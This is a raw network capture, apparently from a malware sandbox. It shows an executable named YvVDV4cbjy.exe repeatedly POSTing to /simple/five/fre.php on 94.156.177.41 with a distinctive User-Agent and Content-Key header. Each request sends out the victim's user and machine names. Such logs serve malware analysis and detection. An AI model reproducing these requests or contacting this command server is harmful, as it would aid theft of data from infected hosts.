                            Jan 11, 2025 07:45:10.652456045 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:10 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            48192.168.2.54994594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:10.846940994 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:10.851769924 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:11.552751064 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:11 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            49192.168.2.54995394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:11.711446047 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:11.717555046 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:12.418581009 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:12 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            50192.168.2.54996194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:12.573204041 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:12.578125954 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:13.283997059 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:13 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            51192.168.2.54996894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:13.473692894 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:13.478552103 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:14.187724113 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            52192.168.2.54997494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:14.335848093 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:14.340905905 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:15.050817013 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            53192.168.2.54998094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:15.203553915 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:15.208568096 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:15.918282986 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:15 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            54192.168.2.54998694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:16.071130037 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:16.076062918 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:16.804552078 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:16 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            55192.168.2.54999394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:16.945713997 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:16.950781107 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:17.675302029 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:17 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            56192.168.2.55000294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:17.823518038 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:17.828450918 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:18.537332058 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:18 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            57192.168.2.55001094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:18.938288927 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:18.943087101 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:19.654258013 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:19 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            58192.168.2.55001694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:19.811455011 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:19.816581011 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:20.537265062 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:20 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            59192.168.2.55002294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:20.687104940 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:20.695533991 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:21.400357962 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:21 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            60192.168.2.55002794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:21.901951075 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:21.906790972 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:22.637254000 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:22 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            61192.168.2.55003794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:22.796314955 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:22.801196098 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:23.500176907 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:23 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            62192.168.2.55004394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:23.650038958 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:23.654932976 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:24.391447067 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:24 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            63192.168.2.55004494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:24.661158085 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:24.666068077 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:25.386995077 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:25 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            64192.168.2.55004594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:25.543946981 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:25.549065113 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:26.266272068 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:26 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            65192.168.2.55004694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:26.425388098 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:26.431338072 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:27.122733116 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:27 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            66192.168.2.55004794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:27.494793892 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:27.499769926 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:28.215221882 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:28 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            67192.168.2.55004894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:28.370795965 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:28.375674963 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:29.109587908 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:28 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            68192.168.2.55004994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:29.275578976 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:29.280517101 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
